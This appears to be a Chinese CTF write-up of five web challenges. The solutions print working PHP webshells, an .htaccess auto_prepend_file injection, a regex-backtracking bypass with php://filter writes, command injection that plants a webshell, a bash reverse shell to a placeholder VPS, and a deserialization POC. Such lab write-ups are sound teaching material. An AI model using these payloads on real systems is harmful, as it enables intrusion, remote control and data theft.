easycon
考点:一句话,base64转图片
访问index.php,提示eval post cmd,应该是有一句话,直接蚁剑连接
里面有一个bbbbbbbbb.txt,打开发现是一串base64编码
发现是jpg头,base64转图片即可
easyphp
考点:.htaccess
<?php
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "\nHello, world");
?>
代码审计,content不能有on|html|type|flag|upload|file关键字,filename只能有字母和点,且每次访问都会删除当前目录除index.php之外的文件。
我们先尝试写一个一句话进去
?filename=a.php&content=/**/<?php eval($_POST[1]);?>/*
然而发现并没有解析,猜测配置文件中关闭了php解析(该题应该是只设置index.php解析)
开发者既可以在主配置文件中更改 php_flag值,也可以在分布式配置文件(.htaccess)中更改此值
且.htaccess优先度高于主配置文件
.htaccess可以更改 auto_append_file 这个属性,这个属性是指php文件自动包含的文件,可以自己包含自己来获取webshell
法一:
?filename=.htaccess&content=php_value%20auto_prepend_fi\%0ale%20".htaccess"%0a%23%20<?php system($_POST["cmd"]);?>\
这里%23也就是#的作用是注释,避免服务端报错
法二
?content=php_value%20pcre.backtrack_limit%200%0aphp_value%20pcre.jit%200%0a%23\&f ilename=.htaccess
这里通过设置正则回溯次数来绕过正则匹配,之后就可以用伪协议写入木马
?filename=php://filter/write=convert.base64- decode/resource=.htaccess&content=cGhwX3ZhbHVlIHBjcmUuYmFja3RyYWNrX2xpbWl0IDAKcG hwX3ZhbHVlIHBjcmUuaml0IDAKcGhwX3ZhbHVlIGF1dG9fYXBwZW5kX2ZpbGUgLmh0YWNjZXNzCiM8P3 BocCBldmFsKCRfR0VUWzFdKTs/Plw&1=phpinfo();
easyphp2
考点:伪协议
url最后是/?file=GWHT.php,猜测是文件包含
访问robots.txt,提示check.php
那我们尝试用伪协议读取,有过滤,编码绕过
?file=php://filter/convert.%6%32ase64-encode/resource=GWHT.php
读到源码:
GWHT.PHP
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>count is here</title>
<style>
html,
body {
overflow: none;
max-height: 100vh;
}
</style>
</head>
<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">
<center><img src="question.jpg" height="200" width="200" /> </center>
<?php
ini_set('max_execution_time', 5);
if ($_COOKIE['pass'] !== getenv('PASS')) {
setcookie('pass', 'PASS');
die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
}
?>
<h1>A Counter is here, but it has someting wrong</h1>
<form>
<input type="hidden" value="GWHT.php" name="file">
<textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
<input type="submit">
</form>
<?php
if (isset($_GET["count"])) {
$count = $_GET["count"];
if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
die('hacker!');
}
echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
}
?>
</body>
</html>
check.php
<?php
$pass = "GWHT";
// Cookie password.
echo "Here is nothing, isn't it ?";
header('Location: /');
看代码先写个马:
?file=GWHT.php&count='|echo "<?= eval(\$_POST[1])?>" > a.php'
蚁剑连接
在/GWHT/README中找到一个md之后的password,解密得到
GWHTCTF
找一找flag位置:
find / -name "flag*"
找到了:
/GWHT/system/of/a/down/flag.txt
直接读取没有权限,我们查看一下ls -la
发现需要root权限或者GWHT用户,执行命令
printf "GWHTCTF" | su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'
Blackcat
F12查看源码,点进MP3,在最底部发现源码
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
die('Ë£¡¾¹¸Ò²ÈÎÒÒ»Ö»¶úµÄβ°Í£¡');
}
$clandestine = getenv("clandestine");
if(isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if($hh !== $_POST['Black-Cat-Sheriff']){
die('ÓÐÒâÃé×¼£¬ÎÞÒâ»÷·¢£¬ÄãµÄÃÎÏë¾ÍÊÇÄãÒªÃé×¼µÄÄ¿±ê¡£ÏàÐÅ×Ô¼º£¬Äã¾ÍÊÇÄÇ¿ÅÉäÖаÐÐĵÄ×Óµ¯¡£');
}
echo exec("nc".$_POST['One-ear']);
hash_hmac()函数第二个参数为数组的时候,返回结果为NULL。
<?php
$cmd0=";bash -c 'bash -i >%26 /dev/tcp/vps/ip/8888 0>%261'";
$cmd = ";bash -c 'bash -i >& /dev/tcp/vps/ip/8888 0>&1'";
$hmac = hash_hmac('sha256', $cmd, false);
echo "White-cat-monitor[]=a&One-ear=".$cmd0."&Black-Cat-Sheriff=".$hmac;
反弹shell即可
easyser
考点:SSRF,绕过死亡exit
查看robots.txt文件提示star1.php
进入查看源码,提示小胖说用个不安全的协议从我家才能进ser.php呢
使用:
http://127.0.0.1/ser.php
得到源码:
<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';
class GWHT{
public $hero;
public function __construct(){
$this->hero = new Yasuo;
}
public function __toString(){
if (isset($this->hero)){
return $this->hero->hasaki();
}else{
return "You don't look very happy";
}
}
}
class Yongen{ //flag.php
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;
}
public function hasaki(){
$d = '<?php die("nononon");?>';
$a= $d. $this->text;
@file_put_contents($this-> file,$a);
}
}
class Yasuo{
public function hasaki(){
return "I'm the best happy windy man";
}
}
?>
构造POC:
<?php
class GWHT{
public $hero;
}
class Yongen{ //flag.php
public $file = "php://filter/convert.base64-decode/resource=aaa.php";
public $text = "aaaPD9waHAgZXZhbCgkX1BPU1Rbc10pOyAgPz4=";
}
$a = new GWHT;
$a->hero = new Yongen;
echo urlencode(serialize($a));
扫一扫
989
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
